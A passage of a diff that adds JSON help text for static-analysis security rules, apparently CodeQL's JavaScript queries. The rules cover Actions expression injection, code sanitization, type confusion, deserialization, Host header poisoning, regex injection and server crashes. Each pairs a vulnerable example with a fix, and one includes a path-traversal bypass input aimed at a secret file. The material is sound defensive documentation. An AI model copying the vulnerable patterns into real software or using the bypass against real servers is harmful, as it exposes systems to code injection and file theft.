constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094" ], + "description" : "Invoking user-controlled methods on certain objects can lead to remote code execution.", + "id" : "js/unsafe-dynamic-method-access", + "kind" : "path-problem", + "name" : "Unsafe dynamic method access", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/actions/command-injection", + "name" : "js/actions/command-injection", + "shortDescription" : { + "text" : "Expression injection in Actions" 
+ }, + "fullDescription" : { + "text" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious user to inject code into the GitHub action." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab 
Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following 
example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "actions", "security", "external/cwe/cwe-094" ], + "description" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious\n user to inject code into the GitHub action.", + "id" : "js/actions/command-injection", + "kind" : "problem", + "name" : "Expression injection in Actions", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.3" + } + }, { + "id" : "js/bad-code-sanitization", + "name" : "js/bad-code-sanitization", + "shortDescription" : { + "text" : "Improper code sanitization" + }, + "fullDescription" : { + "text" : "Escaping code as HTML does not provide protection against code injection." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Improper code sanitization\nUsing string 
concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Escaping code as HTML does not provide protection against code injection.", 
+ "id" : "js/bad-code-sanitization", + "kind" : "path-problem", + "name" : "Improper code sanitization", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/type-confusion-through-parameter-tampering", + "name" : "js/type-confusion-through-parameter-tampering", + "shortDescription" : { + "text" : "Type confusion through parameter tampering" + }, + "fullDescription" : { + "text" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. 
But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. 
This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n", + "markdown" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. 
Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. 
This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-843" ], + "description" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type.", + "id" : "js/type-confusion-through-parameter-tampering", + "kind" : "path-problem", + "name" : "Type confusion through parameter tampering", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/unsafe-deserialization", + "name" : "js/unsafe-deserialization", + "shortDescription" : { + "text" : "Deserialization of user-controlled data" + }, + "fullDescription" : { + "text" : "Deserializing user-controlled data may allow attackers to execute arbitrary code." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n", + "markdown" : "# 
Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-502" ], + "description" : "Deserializing user-controlled data may allow 
attackers to\n execute arbitrary code.", + "id" : "js/unsafe-deserialization", + "kind" : "path-problem", + "name" : "Deserialization of user-controlled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.8" + } + }, { + "id" : "js/host-header-forgery-in-email-generation", + "name" : "js/host-header-forgery-in-email-generation", + "shortDescription" : { + "text" : "Host header poisoning in email generation" + }, + "fullDescription" : { + "text" : "Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. 
This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n", + "markdown" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. 
A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 
'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-640" ], + "description" : "Using the HTTP Host header to construct a link in an email can facilitate phishing\n attacks and leak password reset tokens.", + "id" : "js/host-header-forgery-in-email-generation", + "kind" : "path-problem", + "name" : "Host header poisoning in email generation", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/regex-injection", + "name" : "js/regex-injection", + "shortDescription" : { + "text" : "Regular expression injection" + }, + "fullDescription" : { + "text" : "User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. 
In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Regular expression injection\nConstructing a regular 
expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. 
This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "User input should not be used in regular expressions without first being escaped,\n otherwise a malicious user may be able to inject an expression that could require\n exponential time on certain inputs.", + "id" : "js/regex-injection", + "kind" : "path-problem", + "name" : "Regular expression injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/server-crash", + "name" : "js/server-crash", + "shortDescription" : { + "text" : "Server crash" + }, + "fullDescription" : { + "text" : "A server that can be forced to crash may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. 
A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n 
res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", + "markdown" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient 